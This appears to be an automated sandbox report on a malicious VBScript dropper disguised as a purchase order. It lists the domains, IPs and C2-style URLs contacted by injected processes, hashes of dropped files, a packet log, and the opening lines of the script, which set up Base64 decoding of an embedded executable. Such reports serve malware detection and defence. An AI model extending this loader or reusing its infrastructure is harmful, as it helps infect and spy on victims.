https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=waytoocool.life&utm | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cs.deviceatlas-cdn.com/101dacs.js | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/images/vendor-1/icon/101domain.ico | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/css/vendor-1.css?20241209054434 | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://park.101datacenter.net/images/vendor-1/google-reviews.svg | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.timai.shop | JogKDBeJAc.exe, 00000007.00000002.3306103928.00000000055A4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/images/vendor-1/com.png | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.101domain.com/gmail_email_aliases.htm | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/js/pricing.js?20241209054434 | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/js/jquery-3.6.0.min.js?20241209054434 | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-101 | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.101domain.com/resource_center.htm | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cs.deviceatlas-cdn.com/smartclick | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.101domain.com/external_links.htm | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/css/fonts/LatoRegular.woff2 | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cs.deviceatlas-cdn.com | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://park.101datacenter.net | JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/css/fonts/LatoRegular.woff) | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop | JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003686000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.101domain.com/domain_concierge_service.htm?query=waytoocool.life&utm_campaign=parked-pag | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/images/vendor-1/park-back.jpg | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/css/fonts/LatoRegular.woff2) | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.northidahoscans.online/sk-logabpstatus.php?a=L2g4bEdyRU15NHN0SHVwVWZwYVdjU3FNL0laQndpc0cz | chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/js/modernizr-webp.js?20241209054434 | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/images/vendor-1/park-back.webp | JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://park.101datacenter.net/images/vendor-1/101domain-logo.svg | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_source | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
52.60.87.163 | www.waytoocool.life | United States | 16509 | AMAZON-02US | false
199.15.251.162 | pin-ballerz.net | United States | 29713 | ELIA-60US | false
103.224.182.242 | www.brickhills.site | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
208.91.197.27 | www.northidahoscans.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | false
18.166.177.211 | just-do-public-0526-cpdhe.jiexi-010.top | United States | 16509 | AMAZON-02US | false
199.193.6.134 | www.allstary.top | United States | 22612 | NAMECHEAP-NETUS | false
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1576423
                                                Start date and time:2024-12-17 03:39:19 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 59s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:PO1341489LTB GROUP.vbs
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winVBS@9/3@8/6
                                                Cookbook Comments:
                                                • Found application associated with file extension: .vbs
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
21:41:15 | API Interceptor | 2057408x Sleep call for process: chkntfs.exe modified
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):226
                                                Entropy (8bit):5.360398796477698
                                                Encrypted:false
                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                MD5:3A8957C6382192B71471BD14359D0B12
                                                SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                Malicious:false
                                                Reputation:high, very likely benign file
Preview:
1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
                                                Process:C:\Windows\SysWOW64\chkntfs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                Category:dropped
                                                Size (bytes):196608
                                                Entropy (8bit):1.121297215059106
                                                Encrypted:false
                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Process:C:\Windows\System32\wscript.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):335360
                                                Entropy (8bit):7.903407989667696
                                                Encrypted:false
                                                SSDEEP:6144:olxP3BuIQQMqMLZFGLrtFaVkZKwQabJ4klsdy9Urg/rlAji5eyh2ptWlT6trxkD/:obP33yqMdFGLxFRUwz7Gy9oCrz5xMtW5
                                                MD5:D9A430A4C9B06A9C5F69147498335567
                                                SHA1:F91B0388A404A217B4ACC5A164133EC5F4005A6F
                                                SHA-256:0078E04B8BE75F019E8137D0276567A7C47B14224E0F7AAD2B3585BB4C8BAE45
                                                SHA-512:A3A68669137192EA91DF582049516887C95CD0BD77A6BA500C74DDE23ADDB3C8618901BD91AA3C6A12869151342E10139DD3E9AC8B5CE07D637E50D7088A9E24
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 55%
                                                File type:ASCII text, with very long lines (65235), with CRLF line terminators
                                                Entropy (8bit):5.987122412782155
                                                TrID:
                                                • Visual Basic Script (13500/0) 100.00%
                                                File name:PO1341489LTB GROUP.vbs
                                                File size:465'760 bytes
                                                MD5:fe2b1e9947e1f7ab65d6542ba1abccc0
                                                SHA1:2753756f5438d94c49fad80ba14bb5440a4b260a
                                                SHA256:d618b1d56fbd24ce3c15bfd5c238f9ad8695156667d4b6e04c378f8eca6e34d7
                                                SHA512:0390d5adeaa53471abea236fe16dfd2ea1f35f98028899b80bc42e338d55156a80d56b0c347727778874a8a7496e18e943f36b1aea3585bb6a2569e774fc9283
                                                SSDEEP:6144:+4RU/er9SEoegy/BCHgjsFXQxe/AbfFi/UcVSSMbv+cO2GGCsuqxbw:+OcmpCHgjsF87DFi/BMfGdqx8
                                                TLSH:2BA4E021C515A23FCEAA8F9E72040FE2B8F4047EDE89D646F40F586A5EF46354476F28
File Content Preview:
' Define constants for XML and Base64 processing
Const XML_TYPE = "MSXML2.DOMDocument"
Const ELEMENT_TYPE = "text"
Const DATA_TYPE = "bin.base64"

' Declare variables
Dim base64EncodedString, tempFolderPath, executablePath

' Initialize the Base64
                                                Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Dec 17, 2024 03:41:44.910770893 CET4988680192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:45.190260887 CET4988680192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:46.209836006 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:46.329674959 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:46.329793930 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:46.353830099 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:46.473623991 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:46.473701954 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:47.563179016 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:47.563297033 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:47.563371897 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:47.862080097 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:48.882781029 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:49.002458096 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:49.002672911 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:49.013583899 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:49.133327961 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:50.236946106 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:50.237127066 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:50.237181902 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:50.369240999 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:50.488944054 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:55.974720001 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:56.094428062 CET804991852.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:56.094526052 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:56.111262083 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:56.231034994 CET804991852.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:57.208544016 CET804991852.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:57.208688974 CET804991852.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:57.208810091 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:57.627763987 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:58.645817995 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:58.786267996 CET804992452.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:58.786343098 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:58.800487041 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:59.029165983 CET804992452.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:59.898473978 CET804992452.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:59.898495913 CET804992452.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:59.898607969 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:00.315186977 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:01.333448887 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:01.453350067 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:01.454343081 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:01.467783928 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:01.587675095 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:01.587691069 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:02.625368118 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:02.649990082 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:02.650058985 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:02.971452951 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:03.995183945 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:04.115307093 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:04.115447044 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:04.124947071 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:04.244852066 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227713108 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227760077 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227838993 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227982044 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227991104 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228013992 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.228040934 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.228246927 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228256941 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228266001 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228317022 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.228317022 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.228593111 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228606939 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228681087 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.347732067 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.347811937 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.351277113 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.351900101 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.393213987 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.419807911 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.419891119 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.422633886 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.424006939 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.427952051 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.428091049 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.431216955 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.551088095 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:11.643682957 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:11.763451099 CET804995718.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:11.763979912 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:11.776240110 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:11.895895004 CET804995718.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:13.288774967 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:13.409030914 CET804995718.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:13.409183979 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:14.302330971 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:14.422105074 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:14.422278881 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:14.435077906 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:14.554909945 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:15.940125942 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:16.014107943 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:16.014471054 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:16.016839027 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:16.016839027 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:16.060374975 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:16.063134909 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:17.317512989 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:17.437339067 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:17.438874006 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:17.451250076 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:17.571239948 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:17.571301937 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:18.955713034 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:19.036968946 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:19.037044048 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:19.037055969 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:19.037134886 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:19.075397968 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:19.075459957 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:19.974136114 CET4998080192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:20.093977928 CET804998018.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:20.094973087 CET4998080192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:20.107106924 CET4998080192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:20.226814032 CET804998018.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:21.676249027 CET804998018.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:21.676273108 CET804998018.166.177.211192.168.2.5
